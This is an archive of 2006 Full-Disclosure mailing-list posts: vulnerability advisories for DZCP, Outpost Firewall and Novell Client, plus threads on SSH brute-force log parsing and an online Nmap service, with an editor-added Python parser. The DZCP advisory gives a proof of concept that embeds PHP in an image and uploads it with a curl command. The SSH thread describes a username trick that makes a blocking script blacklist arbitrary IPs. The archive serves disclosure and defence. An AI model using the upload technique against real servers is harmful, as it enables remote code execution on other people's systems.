o yorn for showing me DZCP and the basics of SQL injections
o the DZCP authors for the fun in secure.php

From scy-adv at scytale.de Fri Dec 1 09:45:03 2006
From: scy-adv at scytale.de (Tim Weber)
Date: Fri, 1 Dec 2006 10:45:03 +0100
Subject: [Full-disclosure] deV!L`z Clanportal - Arbitrary File Upload [061124b]
Message-ID: <200612011045.03740.scy-adv@scytale.de>

/ -[061124b]- \
| deV!L`z Clanportal - Arbitrary File Upload |
\ /

S Y N O P S I S /
================='

-( access: remote   severity: high )-

deV!L`z Clanportal allows nearly arbitrary files to be uploaded and stored on the server's filesystem, which enables anyone, even without a user account, to upload PHP code and execute it, leading to arbitrary code execution.

B A C K G R O U N D /
====================='

deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow anybody to create a feature-rich website for her online gaming clan.
A F F E C T E D   V E R S I O N S /
===================================' 

verified on:         1.3.6
possibly vulnerable: <= 1.3.6
fixed in:            1.3.6.1

I M P A C T /
=============' 

The attacker can run her own code on the web server with the same privileges as DZCP itself, enabling her to do almost anything from getting the MySQL password to hosting her own files and scripts or getting a shell on the server.

P R E R E Q U I S I T I E S /
=============================' 

 o the attacker needs a file that is both a valid JPEG or GIF file and valid PHP (or probably other) code

D E S C R I P T I O N /
=======================' 

upload/index.php is not checking the file extension of uploaded files. Instead it is simply checking the MIME type (that can be spoofed) and the format of an uploaded image. A skilled attacker could upload an image file that has been specially crafted to contain PHP code and yet be recognized as a valid image. The file will be stored on the server, using a file name supplied by the attacker (ending in .php, for example), and can then be executed via HTTP.

W O R K A R O U N D /
=====================' 

Some possibilities:
 o Add something like this before the "switch" statement in upload/index.php:
     if (isset($_FILES['file']['name']) && !preg_match('/\.(jpg|gif)$/i', $_FILES['file']['name'])) die();
 o Remove upload/index.php or make it inaccessible.
 o Quit using DZCP. I mean it! There are tons of other vulnerabilities just waiting to be exploited; some of them might be as severe as this one. IMHO, DZCP is just a chaotic bunch of vulnerabilities that, by some coincidence, happen to look like a clan portal.

P R O O F   O F   C O N C E P T /
=================================' 

Get a JPEG file, open it in a hex editor, add some PHP inside the EXIF data or in similar places. Make sure PHP's getimagesize() does not return false and that the file does not throw parse errors or the like when fed to PHP.
Then:
  curl -F 'file=@img.php;type=image/jpeg' 'http:///upload/index.php?action=userpic&do=upload'
Then check http:///inc/images/uploads/userpics/.php

T I M E L I N E  (CET) /
========================' 

2006-11-24  2:00 started searching
            4:00 exploited
           15:05 advisory finished
           17:31 informed vendor that anybody can run arbitrary code
        25 23:00 full disclosure to vendor
        27 14:36 hotfix available on vendor website
     12-01 10:45 full disclosure to the general public

A B O U T   T H E   A U T H O R /
=================================' 

Tim Weber, computer science student at the University of Mannheim, Germany, currently looking for an internship at some IT security or pentesting company, can be reached via e-mail: scy-adv-061124b at the host scytale.de.

T H A N K S /
=============' 

 o Kallista
 o the cat in the fridge
 o KHexEditor
 o the DZCP authors for the fun in secure.php

From david at matousec.com Fri Dec 1 10:12:30 2006
From: david at matousec.com (David Matousek)
Date: Fri, 01 Dec 2006 11:12:30 +0100
Subject: [Full-disclosure] Outpost Bypassing Self-Protection via Advanced DLL injection with handle stealing Vulnerability
Message-ID: <4570000E.8040903@matousec.com>

Hello,

We would like to inform you about a vulnerability in Outpost Firewall PRO 4.0.

Description:

The system process services.exe takes care of system services. It runs them during the system boot and thus owns full access handles to all system services. Outpost protects all processes against common DLL injection and forbids other processes to manipulate its own service process. However, it does not protect services.exe against Advanced DLL injection that does not rely on writing into the target process memory. It is possible to infect services.exe with a malicious DLL and execute arbitrary code in this system process. It is also possible to find and use its handle of the outpost.exe process to infect the Outpost service process similarly.
As a result, the attacker is able to inject arbitrary code into Outpost's process and thus bypass any of its security mechanisms.

Vulnerable software:
 * Outpost Firewall PRO 4.0 (971.584.079)
 * Outpost Firewall PRO 4.0 (964.582.059)
 * probably all older versions of Outpost Firewall PRO 4.0
 * possibly older versions of Outpost Firewall PRO

More details and a proof of concept including its source code are available here:
http://www.matousec.com/info/advisories/Outpost-Bypassing-Self-Protection-via-Advanced-DLL-injection-with-handle-stealing.php

Regards,

-- 
Matousec - Transparent security
Research
http://www.matousec.com/

From dudevanwinkle at gmail.com Fri Dec 1 11:48:38 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 06:48:38 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>
Message-ID:

On 12/1/06, Mike Huber wrote:
> first of all, IANAL, but the TOS seem to cover the basics...
> None-the-less, my 8-ball sees litigation in their future.

portscanning isn't illegal in the states

-JP

From tonnerre.lombard at sygroup.ch Fri Dec 1 12:17:26 2006
From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard)
Date: Fri, 01 Dec 2006 13:17:26 +0100
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <45701925.7060503@infiltrated.net>
References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net>
Message-ID: <1164975446.39297.41.camel@aspirateur.sygroup-int.ch>

Salut,

On Fri, 2006-12-01 at 06:59 -0500, J. Oquendo wrote:
> >> Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
> >> awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}'
> >
> > What if I set my user name to "bikermice from mars"? Are you going to
> > blacklist mars then?
>
> Apparently you are as stupid as your question is. The syntax won't allow
> to pass off anything. Try it before responding idiotically

Did you even try it? And what exactly in this awk statement would prevent me from inserting mars in this case? The log statement would look like this:

Nov 27 16:31:21 local sshd[67010]: Illegal user bikermice from mars from 213.134.128.227

In this case, your awk statement checks that argument $6 is "Illegal" (which it is) and argument $9 is "from" (which it is). So it takes $10 and prints it (in this case, mars.)

If you check $10 to look like an IP address, I set my username to "bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1 because it is a valid IP.

Tonnerre
-- 
SyGroup GmbH                    Tonnerre Lombard
Solutions Systematiques         Tel:+41 61 333 80 33
Roeschenzerstrasse 9            Fax:+41 61 383 14 67
4153 Reinach BL                 Web:www.sygroup.ch
tonnerre.lombard at sygroup.ch

From sil at infiltrated.net Fri Dec 1 12:26:01 2006
From: sil at infiltrated.net (J. Oquendo)
Date: Fri, 01 Dec 2006 07:26:01 -0500
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <1164975446.39297.41.camel@aspirateur.sygroup-int.ch>
References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch>
Message-ID: <45701F59.4050502@infiltrated.net>

Tonnerre Lombard wrote:
> In this case, your awk statement checks that argument $6 is
> "Illegal" (which it is) and argument $9 is "from" (which it is). So it
> takes $10 and prints it (in this case, mars.)
>
> If you check $10 to look like an IP address, I set my username to
> "bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1
> because it is a valid IP.
>
> Tonnerre
>

So again... Some of you guys need to go back and read before you post....

awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}'

Once you try a moronic name insertion it makes the columns more than 10 rows, invalidating it. Is this a difficult concept to understand? Set your host to whatever you would like, it's been discussed and resolved. Is there anything else? Perhaps I should re-write TCP into the script to ensure no one ever spoofs again.

-- 
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams
From tonnerre.lombard at sygroup.ch Fri Dec 1 12:44:22 2006
From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard)
Date: Fri, 01 Dec 2006 13:44:22 +0100
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <45701F59.4050502@infiltrated.net>
References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net>
Message-ID: <1164977062.39297.49.camel@aspirateur.sygroup-int.ch>

Salut,

On Fri, 2006-12-01 at 07:26 -0500, J. Oquendo wrote:
> So again... Some of you guys need to go back and read before you post....

In this case, the NF wasn't in your original posting, so I could hardly have seen it. Still, there are problems with it, but not security wise...

> awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}'
>
> Once you try a moronic name insertion it makes the columns more than 10
> rows invalidating it.

In that case, your script isn't going to work in most cases. For example, on our router we get:

Dec 1 13:35:24 rtsyg01 sshd[12178]: Failed password for invalid user asdf from 10.1.5.166 port 51558 ssh2

-> more than 10 columns.

Also, one of our customers uses user names which consist of two parts which are separated by spaces. This is due to his use of Windows. The users are called e.g. "John Doe", so you do an ssh "John Doe at servername.asdf.ch".
In this case, your script fails entirely. Probably a top-down parser isn't really suitable for this. If at all, you should make an attempt to parse from the end of the string. sed can help you there.

> Perhaps I should re-write TCP into the script to ensure no one ever
> spoofs again.

That wouldn't be very useful since the L4Addr doesn't matter much here, as we're dealing with L3addrs...

Tonnerre
-- 
SyGroup GmbH                    Tonnerre Lombard
Solutions Systematiques         Tel:+41 61 333 80 33
Roeschenzerstrasse 9            Fax:+41 61 383 14 67
4153 Reinach BL                 Web:www.sygroup.ch
tonnerre.lombard at sygroup.ch

From sil at infiltrated.net Fri Dec 1 12:50:14 2006
From: sil at infiltrated.net (J. Oquendo)
Date: Fri, 01 Dec 2006 07:50:14 -0500
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <1164977062.39297.49.camel@aspirateur.sygroup-int.ch>
References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <1164977062.39297.49.camel@aspirateur.sygroup-int.ch>
Message-ID: <45702506.4070300@infiltrated.net>

Tonnerre Lombard wrote:
> Salut,
>
> On Fri, 2006-12-01 at 07:26 -0500, J. Oquendo wrote:
>
>> So again... Some of you guys need to go back and read before you post....
>>
>
> In this case, the NF wasn't in your original posting, so I could hardly
> have seen it. Still, there are problems with it, but not security
> wise...
>
>
>> awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}'
>>
>> Once you try a moronic name insertion it makes the columns more than 10
>> rows invalidating it.
>>
>
> In that case, your script isn't going to work in most cases. For
> example, on our router we get:
>
> Dec 1 13:35:24 rtsyg01 sshd[12178]: Failed password for invalid user
> asdf from 10.1.5.166 port 51558 ssh2
>
> -> more than 10 columns.
>
>

And this is my problem how? The script was written mainly for myself and was passed on as something someone can use at their leisure and expense. "Your script isn't going to work, boohoo." Is it not customizable to fit your need? I would think so; all it is doing is text processing, no-brainer there.

> Also, one of our customers uses user names which consist of two parts
> which are separated by spaces. This is due to his use of Windows. The
> users are called e.g. "John Doe", so you do an ssh "John
> Doe at servername.asdf.ch". In this case, your script fails entirely
>

Again... Re-read my previous paragraph.

-- 
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams
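Two points from the exchange above deserve working code: J. Oquendo's NF<=10 field-count guard (which throws away legitimate lines such as the "Failed password for invalid user ... port ... ssh2" form and any username containing a space) and Tonnerre's suggestion to parse from the end of the string instead. The Python below is an added example by the editor, not a script posted by anyone in the thread. It anchors both sshd formats on the tail of the line, so the captured address is always the last "from" token that sshd itself wrote, whatever the client stuffed into the username, and refuses to count anything that is not an IP literal. The log lines are constructed (documentation address ranges), and the block threshold of 3 is an assumption.

```python
import re
from collections import Counter
from ipaddress import ip_address
from typing import Dict, Iterable, List, Optional

# Constructed sample lines (203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges, not hosts from the thread). They mirror the two sshd formats quoted in
# the thread plus Tonnerre's username-insertion cases and a spaced username.
SAMPLE_LOG = [
    "Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 203.0.113.5",
    "Nov 27 16:31:30 local sshd[67011]: Illegal user bikermice from mars from 203.0.113.5",
    "Nov 27 16:31:41 local sshd[67012]: Illegal user bikermice from 217.14.64.1 from 203.0.113.5",
    "Dec  1 13:35:24 rtsyg01 sshd[12178]: Failed password for invalid user asdf from 198.51.100.7 port 51558 ssh2",
    "Dec  1 13:35:25 rtsyg01 sshd[12178]: Failed password for invalid user John Doe from 198.51.100.7 port 51559 ssh2",
    "Dec  1 13:35:26 rtsyg01 sshd[12180]: Accepted publickey for alice from 198.51.100.9 port 40000 ssh2",
]

# Both patterns are anchored on the END of the line. The username is
# attacker-controlled and may contain " from <anything>", so a greedy ".*"
# followed by the fixed tail means the captured token is always the last
# "from" field, the one sshd itself appended, regardless of how many words
# or fake "from 1.2.3.4" fragments the client put into the username.
_PATTERNS = (
    re.compile(r"sshd\[\d+\]: (?:Illegal|Invalid) user .* from (\S+)$"),
    re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?.* from (\S+) port \d+ ssh2$"),
)


def source_address(line: str) -> Optional[str]:
    """Peer IP of a failed-login line, or None if the line is not one.

    Anything that is not an IP literal (e.g. "mars" from a line whose only
    "from" was supplied by the attacker) is dropped instead of blacklisted.
    """
    line = line.rstrip("\r\n")
    for pattern in _PATTERNS:
        match = pattern.search(line)
        if match:
            try:
                return str(ip_address(match.group(1)))
            except ValueError:
                return None
    return None


def count_failures(lines: Iterable[str]) -> Dict[str, int]:
    """Number of failed-login lines per source address."""
    counts: Counter = Counter()
    for line in lines:
        addr = source_address(line)
        if addr is not None:
            counts[addr] += 1
    return dict(counts)


def offenders(lines: Iterable[str], threshold: int = 3) -> List[str]:
    """Addresses with at least `threshold` failures (the block candidates)."""
    return sorted(addr for addr, n in count_failures(lines).items() if n >= threshold)


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(f"{str(source_address(entry)):>16}  {entry}")
    print("block candidates:", offenders(SAMPLE_LOG))
```

Reading the address from the right-hand end is what "parse from the end of the string" amounts to; the awk analogue is $NF for the Illegal-user form and $(NF-3) for the Failed-password form rather than a fixed $10. Lines in a phrasing the two patterns do not know simply yield None, so an unexpected format produces no block rather than a bogus one.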
From jammer128 at gmail.com Fri Dec 1 12:56:43 2006
From: jammer128 at gmail.com (Jason Miller)
Date: Fri, 1 Dec 2006 06:56:43 -0600
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>
Message-ID: <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com>

I agree with Dave on this one. Dude Van, I thought it was illegal in the states..? Or am I mistaken? Also, think of this from the ISP's view, do they really want a service port scanning their users? And look at it this way, said target has a proxy server on it, attacker proxies into the proxy and scans the target server with that service, since he is now on the target's IP address, I think you understand what I'm getting at by now. nmap is made to find exploits, that is what this service is going to wind up being abused for (in most cases that I know).

On 12/1/06, Dave Moore wrote:
>
> On 12/1/06, Mike Huber wrote:
> > first of all, IANAL, but the TOS seem to cover the basics... However, I am
> > unsure whether they would hold up under strict legal scrutiny. As far as I
> > can tell, they may hold up under US criminal law, but not under civil law,
> > as tort law has its own wonderful little eccentricities. The best safeguard
> > they seem to have is that they must log the source IP of all scan
> > requests... As far as I know, anyone who takes the time to read the nmap
> > man page should be able to craft a scan which won't be detected by the
> > scanned host (can someone be a definitive source on this point?), and anyone
> > taking malicious action ought to be taking sufficient precautions to avoid
> > detection anyway. None-the-less, my 8-ball sees litigation in their future.
>
> All nmap scans are detectable. All port scans are detectable. Just
> depends on how hard you're looking.
>

From ltr at isc.upenn.edu Fri Dec 1 13:50:48 2006
From: ltr at isc.upenn.edu (David Taylor)
Date: Fri, 1 Dec 2006 08:50:48 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <456BF10D.9080400@matousec.com>
Message-ID: <01af01c7154f$b518a780$654b5b82@shakuhachi>

How do you plan on dealing with all the abuse complaints you get hit with when people use your server to perform unauthorized scans of their networks?

==================================================
David Taylor //Sr. Information Security Specialist
University of Pennsylvania Information Security
Philadelphia PA USA
(215) 898-1236
http://www.upenn.edu/computing/security/
==================================================

Shadowserver Foundation Member
http://www.shadowserver.org/

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of David Matousek
Sent: Tuesday, November 28, 2006 3:19 AM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] Nmap Online

Hello,

For all Nmap fans, our group have implemented Nmap Online service.
Its address is http://nmap-online.com/. The interface allows you to perform custom Nmap scans from our server with only a few limitations in the syntax.
The service is free and can be used immediately, no registration is required.

Please direct your questions and suggestions to our emails.

Regards,

-- 
David Matousek
Founder and Chief Representative of Matousec - Transparent security
http://www.matousec.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From falco at gentoo.org Fri Dec 1 14:02:26 2006
From: falco at gentoo.org (Raphael Marichez)
Date: Fri, 1 Dec 2006 15:02:26 +0100
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <45701F59.4050502@infiltrated.net>
References: <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net>
Message-ID: <20061201140226.GC26621@falco.falcal.net>

On Fri, 01 Dec 2006, J. Oquendo wrote:
> Tonnerre Lombard wrote:
> >
> >In this case, your awk statement checks that argument $6 is
> >"Illegal" (which it is) and argument $9 is "from" (which it is). So it
> >takes $10 and prints it (in this case, mars.)
> >
> >If you check $10 to look like an IP address, I set my username to
> >"bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1
> >because it is a valid IP.
> >
> > Tonnerre
> >
>
> So again... Some of you guys need to go back and read before you post....

ok, you're right, let's go back and let's read again:

You mention (from the attached mail, you've written):

Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}'

Note that there is no "NF" in this line.

> > awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}'
>

you're fixing your script when someone shows a security hole, that's a good practice. But don't insult the men who mention the vulnerabilities... They are actually helping you, because you're improving your script thanks to them.
> > Once you try a moronic name insertion it makes the columns more than 10 rows invalidating it.
> > Is this a difficult concept to understand? Set your host to whatever you would like, its been
> > discussed and resolved. Is there anything else? Perhaps I should re-write TCP into the script
> > to ensure no one ever spoofs again.
>

-- 
Raphaël Marichez aka Falco

From falco at gentoo.org Fri Dec 1 14:04:59 2006
From: falco at gentoo.org (Raphael Marichez)
Date: Fri, 1 Dec 2006 15:04:59 +0100
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <20061201140226.GC26621@falco.falcal.net>
References: <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <20061201140226.GC26621@falco.falcal.net>
Message-ID: <20061201140459.GD26621@falco.falcal.net>

On Fri, 01 Dec 2006, Raphael Marichez wrote:
> You mention (from the attached mail, you've written):

sorry, here's your email

-- 
Raphaël Marichez aka Falco

-------------- next part --------------
An embedded message was scrubbed...
From: "J. Oquendo"
Subject: Re: [Full-disclosure] SSH brute force blocking tool
Date: Tue, 28 Nov 2006 11:59:43 -0500
Size: 15396
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/fa59657f/attachment.mht
From dudevanwinkle at gmail.com Fri Dec 1 14:09:25 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 09:09:25 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com>
Message-ID:

On 12/1/06, Jason Miller wrote:
> I agree with Dave on this one. Dude Van, I thought it was illegal in the
> states..? Or am I mistaken?

http://www.securityfocus.com/news/126

> Also, think of this from the ISP's view, do they
> really want a service port scanning their users? And look at it this way,
> said target has a proxy server on it, attacker proxies into the proxy and
> scans the target server with that service, since he is now on the targets IP
> address, I think you understand what I'm getting at by now. nmap is made to
> find exploits, that is what this service is going to wind up being abused
> for (in most cases that i know).

nmap is used to find open ports and fingerprint OS's. What you do with that info is up to you. Here is an example of what is legal vs what isn't:

If you scan a machine with nmap from one machine, that is not illegal.

If you run 100,000 nmap scans from a distributed botnet and take down their server, that's illegal.

If your nmap scan tells you that port 80 is open and you run a nessus scan and find that they are vulnerable to a bug in their webserver, is that illegal? I do know if you exploit that weakness and backdoor their machine, you just broke the law, but am unsure about nessus's legality on systems you don't have a get out of jail free card for or own. I have no doubt about nmap though.
as long as you don't take down their servers with the scans, you are legit.

-JP

From sil at infiltrated.net Fri Dec 1 14:09:25 2006
From: sil at infiltrated.net (J. Oquendo)
Date: Fri, 01 Dec 2006 09:09:25 -0500
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <20061201140226.GC26621@falco.falcal.net>
References: <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <20061201140226.GC26621@falco.falcal.net>
Message-ID: <45703795.4070002@infiltrated.net>

Raphael Marichez wrote:
> you're fixing your script when someone shows a security hole, that's a
> good practice. But don't insult the men who mention the
> vulnerabilities... They are actually helping you, because you're improving
> your script thanks to them.
>

Hello... Some of you guys seriously need to do some reading and refreshing of your browsers... The script was fixed days ago.

http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050952.html

// SNIPPED

Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}'

Would stop the insertion attack and only print out the tenth field if fields 5, 6 and 9 match Illegal user from. So that would pretty much minimize the attack on name insertion. If I wanted to I could also make sure that if someone came after field 10, then ignore the entire line:

Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 ...

SO let me restate. I could modify it to look at lines 5, 6, and 9 ... Take a look at the tenth column and if anything comes after that... Ignore that entire line... Should I have done so, maybe...
Will I do so... Maybe...

// END SNIP

And I fixed it the same day to avoid the insertion of moronic usernames. Read the entire thread. My critiques come from people who only snip out what is suitable for them to read.

-- 
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

From juha-matti.laurio at netti.fi Fri Dec 1 14:34:06 2006
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Fri, 1 Dec 2006 16:34:06 +0200 (EET)
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
Message-ID: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi>

From the Reuters article:

"WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said."

Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible.

More at
http://today.reuters.com/News/newsArticle.aspx?type=internetNews&storyID=2006-12-01T061519Z_01_WBT006236_RTRUKOC_0_US-SECURITY-USA-QAEDA.xml&WTmodLoc=InternetNewsHome_C1_%5bFeed%5d-8

SANS Internet Storm Center (ISC) has issued the following Diary entries, several references included:

From ISC director Marcus H. Sachs:
http://isc.sans.org/diary.php?storyid=1900

and "US DHS banking alert" entry released earlier by Johannes Ullrich:
http://isc.sans.org/diary.php?storyid=1899

- Juha-Matti

From colweb at gmail.com Fri Dec 1 12:48:54 2006
From: colweb at gmail.com (Col)
Date: Fri, 1 Dec 2006 12:48:54 +0000
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>
Message-ID: <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com>

"Service unavailable. Please try again later."

That was quick!

Col.

From dswafford at alterhighschool.org Fri Dec 1 14:40:59 2006
From: dswafford at alterhighschool.org (David Swafford)
Date: Fri, 01 Dec 2006 09:40:59 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com>
Message-ID: <456FF8AA.9B1E.0073.0@alterhighschool.org>

Maybe it got hacked? ...I wonder if someone probably didn't like all the portscans they got from it (....thinks of Microsoft) and took it out?

David.

>>> Col 12/1/2006 7:48 am >>>
"Service unavailable. Please try again later."

That was quick!

Col.
From dh at layereddefense.com Fri Dec 1 10:55:55 2006
From: dh at layereddefense.com (Deral Heiland)
Date: Fri, 01 Dec 2006 05:55:55 -0500
Subject: [Full-disclosure] Layered Defense Advisory: Novell Client 4.91 Format String Vulnerability
In-Reply-To: <7.0.1.0.0.20061001180650.021ff140@sbcglobal.net>
References: <7.0.1.0.0.20061001180650.021ff140@sbcglobal.net>
Message-ID: <7.0.1.0.0.20061201055132.027c4de0@layereddefense.com>

==================================================
Layered Defense Advisory 1 December 2006
==================================================
1) Affected Software
Novell Client 4.91 SP2
Novell Client 4.91 SP2 Patch Kit
Novell Client 4.91 SP3
Earlier versions may also be vulnerable
==================================================
2) Severity
Rating: Low - Medium risk
Impact: Read arbitrary memory, denial of service.
==================================================
3) Description of Vulnerability
A format string vulnerability was discovered within Novell Client 4.91. The vulnerability is due to improper processing of format strings within the NMAS (Novell Modular Authentication Services) Information message window. An attacker who enters specially crafted format strings in the Username field at the Novell logon and selects Sequences under the NMAS tab can read data from the winlogon process stack or read from arbitrary memory, and at a minimum cause a denial of service.
==================================================
4) Solution
Fix: Presently no patch is available.
Work around: Disable NMAS Authentication
==================================================
5) Time Table:
07/15/2006 Reported Vulnerability to Vendor.
08/21/2006 Vendor released Novell Client - 4.91 SP2 Patch Kit which made the vulnerability worse.
           (This patch made it easier to read arbitrary memory)
09/17/2006 Contacted Vendor about increased risk with SP2 Patch Kit
11/28/2006 Received the following message from Vendor:
           "At this point in time, development has determined this is a very low priority and apparently it will be some time before the issue is addressed. I have reported this to our Security Review Board so development's claim can be re-examined. As such, you certainly have every right to publish your findings at this time. The bug will remain open against the product. Hopefully this can be fixed in the near future."
==================================================
6) Credits
Discovered by Deral Heiland, www.LayeredDefense.com
==================================================
7) About Layered Defense
Layered Defense is a group of security professionals that work together on ethical Research, Testing and Training within the information security arena.
http://www.layereddefense.com
==================================================

From david at matousec.com Fri Dec 1 14:02:13 2006
From: david at matousec.com (David Matousek)
Date: Fri, 01 Dec 2006 15:02:13 +0100
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <01af01c7154f$b518a780$654b5b82@shakuhachi>
References: <01af01c7154f$b518a780$654b5b82@shakuhachi>
Message-ID: <457035E5.8090405@matousec.com>

